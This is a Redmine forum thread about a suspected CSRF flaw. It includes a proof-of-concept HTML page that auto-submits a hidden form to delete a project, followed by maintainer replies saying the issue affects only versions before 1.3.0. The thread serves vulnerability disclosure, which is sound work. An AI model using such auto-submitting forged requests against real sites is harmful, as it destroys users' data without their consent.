Redmine is still vulnerable against CSRF
Added by Peter Panther almost 13 years ago
It seems that Redmine is still vulnerable against CSRF.
Scenario:
- user is logged in at the redmine server
- user follows a link that executes the following HTML Code
- the project "deleteme" will be deleted automatically and the user will be logged out.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CRSF Demonstration</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { document.forms[0].submit(); } </script> <H2>CRSF Demonstration</H2> <form method="POST" name="form0" action="https://<server>/redmine/projects/deleteme"> <input type="hidden" name="_method" value="delete"/> <input type="hidden" name="confirm" value="1"/> <input type="hidden" name="commit" value="Delete"/> </form> </body> </html>
I thought that this problem was fixed with rails 2.3.11 and CVE-2011-0447?
I'm using- Rails 2.3.11
- Redmine 1.2.3.stable.8195 (MySQL)
Any ideas?
Replies (2)
RE: Redmine is still vulnerable against CSRF - Added by Jan from Planio www.plan.io almost 13 years ago
Thanks for reporting this. However, we were unable to reproduce this with:
- Redmine 1.2.3.stable.8195 (MySQL)
- both Rails 2.3.11 and Rails 2.3.14
If you believe we missed something, please get in touch via security@redmine.org and we'll discuss it off the record until we can determine if it's an actual vulnerability and commit a fix.
Thanks!
RE: Redmine is still vulnerable against CSRF - Added by Jean-Philippe Lang almost 13 years ago
This issue affects Redmine < 1.3.0 only.